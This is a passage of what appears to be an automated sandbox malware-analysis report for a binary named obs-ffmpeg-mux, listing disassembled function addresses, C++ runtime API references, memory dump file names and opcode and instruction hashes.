                                                            • Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FFDA379BD49
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Concurrency::details::_Fac_nodeFac_node::_SchedulerScheduler::_std::_
                                                            • String ID:
                                                            • API String ID: 2050660017-0
                                                            • Opcode ID: 9ff15d03553d094d4f69d7d0519dcecefb7ec8053f8ff6234af53e769483a8fd
                                                            • Instruction ID: a3079f3b25634d95e25cf217a73bc09abadfdd94be04b5ff785249a7b3bbae64
                                                            • Opcode Fuzzy Hash: 9ff15d03553d094d4f69d7d0519dcecefb7ec8053f8ff6234af53e769483a8fd
                                                            • Instruction Fuzzy Hash: 57211E2271AAC995DAA0DB15F46139BB3A2F7C97C0F805531EACD83B69EE3DC544CB00
                                                            Function 00007FFDA379CEF0 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00007FFDA379F4F0: std::_Fac_node::_Fac_node.LIBCPMTD ref: 00007FFDA379F566
                                                            • Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FFDA379CF39
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Concurrency::details::_Fac_nodeFac_node::_SchedulerScheduler::_std::_
                                                            • String ID:
                                                            • API String ID: 2050660017-0
                                                            • Opcode ID: 8563dc5ddfc114c36bbb2d418b63dced280459e9956a66cbfa03a1e979a84f25
                                                            • Instruction ID: d687dceb3a25946955d90d60deca0bac4963936ea1d5bb78bf1f3d8847c8ff5d
                                                            • Opcode Fuzzy Hash: 8563dc5ddfc114c36bbb2d418b63dced280459e9956a66cbfa03a1e979a84f25
                                                            • Instruction Fuzzy Hash: 3E210F6271AAC595DAA0DA15E4503DAB3A2F7C57D0F805431EACD83BAADE3DC544CB00
                                                            Function 00007FFDA379CD30 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 00007FFDA379F420: std::_Fac_node::_Fac_node.LIBCPMTD ref: 00007FFDA379F496
                                                            • Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FFDA379CD79
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Concurrency::details::_Fac_nodeFac_node::_SchedulerScheduler::_std::_
                                                            • String ID:
                                                            • API String ID: 2050660017-0
                                                            • Opcode ID: 9c1a05e7674e20f1d65cbabfac1e87eecd8f78de722740b5ae48dde36e2fcf95
                                                            • Instruction ID: c4f0118b69e7d0d1657de31dba91bf95b1c5cb15aa39893b0f7ce2905daff9d1
                                                            • Opcode Fuzzy Hash: 9c1a05e7674e20f1d65cbabfac1e87eecd8f78de722740b5ae48dde36e2fcf95
                                                            • Instruction Fuzzy Hash: 9E210F2271AAC895DAA0DA15E4603ABB3A2F7C57D0F805535EACD83B69DE3DC554CB00
                                                            Function 00007FFDA379DBF0 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00007FFDA379FC20: std::_Fac_node::_Fac_node.LIBCPMTD ref: 00007FFDA379FC96
                                                            • Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FFDA379DC39
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Concurrency::details::_Fac_nodeFac_node::_SchedulerScheduler::_std::_
                                                            • String ID:
                                                            • API String ID: 2050660017-0
                                                            • Opcode ID: 839b37772a8dc50b26a7b8b8196e789b1de250af1ec8e53ed33d51f2ebfdc970
                                                            • Instruction ID: e4eb194d8425bf90d581bb6c4f57ed60424583c62e47d15c79a1de3972bb8012
                                                            • Opcode Fuzzy Hash: 839b37772a8dc50b26a7b8b8196e789b1de250af1ec8e53ed33d51f2ebfdc970
                                                            • Instruction Fuzzy Hash: 9D212F2271AAC995DAA0DB15E46039AB3A2F7C57D0F805431EACD83B6DDE3DC544CB00
                                                            Function 00007FFDA379B480 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00007FFDA379E990: std::_Fac_node::_Fac_node.LIBCPMTD ref: 00007FFDA379EA06
                                                            • Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FFDA379B4C6
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Concurrency::details::_Fac_nodeFac_node::_SchedulerScheduler::_std::_
                                                            • String ID:
                                                            • API String ID: 2050660017-0
                                                            • Opcode ID: fcdbc4091986c5d8cb29144ee38b86682dd485acb03f8e56e465fa8f6e816088
                                                            • Instruction ID: 93013c9030acfe19b527ead879659e848c135208a6bfe22e8d1c73106aa2b5f7
                                                            • Opcode Fuzzy Hash: fcdbc4091986c5d8cb29144ee38b86682dd485acb03f8e56e465fa8f6e816088
                                                            • Instruction Fuzzy Hash: B721332271D5C592DA70DA55E4603DAB3A2F7C87C4F809931EACD83B6ADE3DCA44CB00
                                                            Function 00007FFDA379C170 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00007FFDA379EE70: std::_Fac_node::_Fac_node.LIBCPMTD ref: 00007FFDA379EEE6
                                                            • Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FFDA379C1B1
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Concurrency::details::_Fac_nodeFac_node::_SchedulerScheduler::_std::_
                                                            • String ID:
                                                            • API String ID: 2050660017-0
                                                            • Opcode ID: 16cbbd99b7191c90b633b3dfbdfa995f048461bebbfe8f54dce2c3974bc1b6c1
                                                            • Instruction ID: 6a7c584cc94360b8dde9ae4d1a5d1a2d13ac95c9ebc2147aeab7dc21b543f933
                                                            • Opcode Fuzzy Hash: 16cbbd99b7191c90b633b3dfbdfa995f048461bebbfe8f54dce2c3974bc1b6c1
                                                            • Instruction Fuzzy Hash: 532127227195C556DA70D655F4613DBB3A2F7C97C0F808935DA8D83B69EE2DCA44CB00
                                                            Function 00007FFDA379C490 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00007FFDA379F010: std::_Fac_node::_Fac_node.LIBCPMTD ref: 00007FFDA379F086
                                                            • Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FFDA379C4D1
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Concurrency::details::_Fac_nodeFac_node::_SchedulerScheduler::_std::_
                                                            • String ID:
                                                            • API String ID: 2050660017-0
                                                            • Opcode ID: c60f66827050ad8ef949a921203d12b31b96e2a70704b78e226c61df733f3b4a
                                                            • Instruction ID: a4f2ba62cefaea2f8bf0a827377c05a87210c2210caaa60ebfafdfa7892d6493
                                                            • Opcode Fuzzy Hash: c60f66827050ad8ef949a921203d12b31b96e2a70704b78e226c61df733f3b4a
                                                            • Instruction Fuzzy Hash: 6121242271D5C596DA70D655E8613DBB3A2F7C87C0F818931EA8D83B6AEE3DC644CB00
                                                            Function 00007FFDA379DA60 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00007FFDA379FAA0: std::_Fac_node::_Fac_node.LIBCPMTD ref: 00007FFDA379FB16
                                                            • Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FFDA379DAA1
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Concurrency::details::_Fac_nodeFac_node::_SchedulerScheduler::_std::_
                                                            • String ID:
                                                            • API String ID: 2050660017-0
                                                            • Opcode ID: 770c508e10f1b5bbbaba705a1cd8fffdd501b9ce067186dde62873fcf570d8b2
                                                            • Instruction ID: 7284200b6f302ea4d6495430290825ee11b1aae629019f26384d1e5ade1fbb98
                                                            • Opcode Fuzzy Hash: 770c508e10f1b5bbbaba705a1cd8fffdd501b9ce067186dde62873fcf570d8b2
                                                            • Instruction Fuzzy Hash: 962144627195C556DA70D615E8603DAB3A2F7C87D0FC08531EACD83B6AED2DCA08CF00
                                                            Function 00007FFDA37CA210 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Fac_nodeFac_node::_std::_
                                                            • String ID:
                                                            • API String ID: 1114552684-0
                                                            • Opcode ID: a528ea6964876682cc8d0d311e06c9c126193cd94c8ea6ed6da39739f90eae04
                                                            • Instruction ID: a459ce67bd82158dca1bcc09f41d6dce6663c63bca7bd24e317c347a69f2ff64
                                                            • Opcode Fuzzy Hash: a528ea6964876682cc8d0d311e06c9c126193cd94c8ea6ed6da39739f90eae04
                                                            • Instruction Fuzzy Hash: 6A11BE7260D68296D660CB59E05426EB7A1FBC8789F400231EACDA3B9ACF6ED514CF04
                                                            Function 00007FFDA37C6E40 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Fac_nodeFac_node::_std::_
                                                            • String ID:
                                                            • API String ID: 1114552684-0
                                                            • Opcode ID: 52b300c58b4d3a21f3ca8ac6621f50b331bf3969ec7eea56343a8c302a2736cd
                                                            • Instruction ID: 8d829e1cd2736246f861fa9488f8b051ead5d6e0300ead5c246339e26faa3c52
                                                            • Opcode Fuzzy Hash: 52b300c58b4d3a21f3ca8ac6621f50b331bf3969ec7eea56343a8c302a2736cd
                                                            • Instruction Fuzzy Hash: 36116A7260D68296D760DB19E09066FB7A1FB88798F040532EACCA3B9ACF6DD504CF44
                                                            Function 00007FFDA37C73F0 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Fac_nodeFac_node::_std::_
                                                            • String ID:
                                                            • API String ID: 1114552684-0
                                                            • Opcode ID: 2efb113960128e9bfb502ae43f614cb772ef3bbe0ddb657f4ba81215d80b9b0f
                                                            • Instruction ID: 47508c566dd7c3a0f06753334f91005b96a29576b1f86118c6431382e09a68c1
                                                            • Opcode Fuzzy Hash: 2efb113960128e9bfb502ae43f614cb772ef3bbe0ddb657f4ba81215d80b9b0f
                                                            • Instruction Fuzzy Hash: CA11517260D6829AD620DB1AE0501AEBBB5F7C8798F400531E6CD93B5ACF7DD605CF04
                                                            Function 00007FFDA37C39B0 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Fac_nodeFac_node::_std::_
                                                            • String ID:
                                                            • API String ID: 1114552684-0
                                                            • Opcode ID: 63fc2972e2fcaaaf2df72369778f9750b42e94823c2a568082a67af764d4253a
                                                            • Instruction ID: ff56662015a1cdfde84e38784793f94e9d32cdcdd1af1322c21e847ad0b62da1
                                                            • Opcode Fuzzy Hash: 63fc2972e2fcaaaf2df72369778f9750b42e94823c2a568082a67af764d4253a
                                                            • Instruction Fuzzy Hash: 9E117F7270DA8296E620DB59E09016FB7A5F788788F000532F6CDA3B5ACF6DD514CF04
                                                            Function 00007FFDA37C3FC0 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Fac_nodeFac_node::_std::_
                                                            • String ID:
                                                            • API String ID: 1114552684-0
                                                            • Opcode ID: a545474d695966fd43bab2eeb0971fa67c9d69b0d42682783ee2bd3077215670
                                                            • Instruction ID: 4484a1db19a7c288025d43930202d1afe3a795a309797af2309bda8c579612c9
                                                            • Opcode Fuzzy Hash: a545474d695966fd43bab2eeb0971fa67c9d69b0d42682783ee2bd3077215670
                                                            • Instruction Fuzzy Hash: 7F11817270E69596D620CB19E05116EB7B1F7C8788F400172EACD93B5ACF6DD545CF04
                                                            Function 00007FFDA37C4670 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Fac_nodeFac_node::_std::_
                                                            • String ID:
                                                            • API String ID: 1114552684-0
                                                            • Opcode ID: 183215ee123dfa6a5963d7762a54e74e006cb9d1c4d95b78fcd85c89a5f39927
                                                            • Instruction ID: f50e1faf6f81bfee846b36d5e66f62303dd16792ca3ada99728d7528b74db6f7
                                                            • Opcode Fuzzy Hash: 183215ee123dfa6a5963d7762a54e74e006cb9d1c4d95b78fcd85c89a5f39927
                                                            • Instruction Fuzzy Hash: 41118E7260D69296D620CB19E0512BEB7E1FB89788F000535E6CDA3B9ACF6DD505CF44
                                                            Function 00007FFDA37C85E0 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Fac_nodeFac_node::_std::_
                                                            • String ID:
                                                            • API String ID: 1114552684-0
                                                            • Opcode ID: 52618c6eb77779a0a12fd183b04623b7ab133b8888c1b31aa37b19bd96e1a504
                                                            • Instruction ID: e7b1f7e0d55c672af96bda1c7475461e35b205901a9d635962fd92a0242920f9
                                                            • Opcode Fuzzy Hash: 52618c6eb77779a0a12fd183b04623b7ab133b8888c1b31aa37b19bd96e1a504
